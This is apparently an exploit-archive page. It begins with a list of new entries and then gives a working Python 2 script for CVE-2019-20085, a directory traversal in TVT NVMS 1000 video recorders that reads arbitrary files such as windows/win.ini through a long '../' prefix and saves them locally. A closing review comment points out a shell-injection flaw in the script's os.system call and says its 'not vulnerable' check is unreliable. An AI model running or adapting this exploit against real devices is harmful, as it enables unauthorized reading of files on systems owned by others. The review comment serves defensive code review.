
7 changes to exploits/shellcodes Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH) Huawei HG630 2 Router - Authentication Bypass TVT NVMS 1000 - Directory Traversal Webtateas 2.0 - Arbitrary File Read WSO2 3.1.0 - Arbitrary File Delete Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection
# Exploit Title: TVT NVMS 1000 - Directory Traversal
|
|
# Date: 2020-04-13
|
|
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
|
|
# Vendor Homepage: http://en.tvt.net.cn/
|
|
# Version : N/A
|
|
# Software Link : http://en.tvt.net.cn/products/188.html
|
|
# Original Author : Numan Türle
|
|
# CVE : CVE-2019-20085
|
|
|
|
import sys
|
|
import requests
|
|
import os
|
|
import time
|
|
|
|
if len(sys.argv) !=4:
|
|
print " "
|
|
print "Usage : python exploit.py url filename outputname"
|
|
print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini"
|
|
print " "
|
|
else:
|
|
|
|
|
|
traversal = "../../../../../../../../../../../../../"
|
|
filename = sys.argv[2]
|
|
url = sys.argv[1]+traversal+filename
|
|
outputname = sys.argv[3]
|
|
content = requests.get(url)
|
|
|
|
if content.status_code == 200:
|
|
|
|
print " "
|
|
print "Directory Traversal Succeeded"
|
|
time.sleep(3)
|
|
print " "
|
|
print "Saving Output"
|
|
os.system("touch " + outputname)
|
|
output_write = open(outputname,"r+")
|
|
output_write.write(content.text)
|
|
output_write.close()
|
|
|
|
else:
|
|
|
|
print "Host not vulnerable to Directory Traversal!" |
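Review bot: `os.system("touch " + outputname)` hands the third command-line argument to a shell unquoted, so an output name containing spaces or shell metacharacters is executed as a command on the machine running the script. The call is not needed, because opening the file in write mode creates it. The touch / `open(outputname,"r+")` / `close()` sequence can become `with open(outputname, "w") as output_write:` followed by `output_write.write(content.text)`, which also closes the handle if the write raises. Separately, the branch on `content.status_code == 200` is a weak signal in both directions, so the "Host not vulnerable" message should not be read as confirmation that a device is patched against CVE-2019-20085.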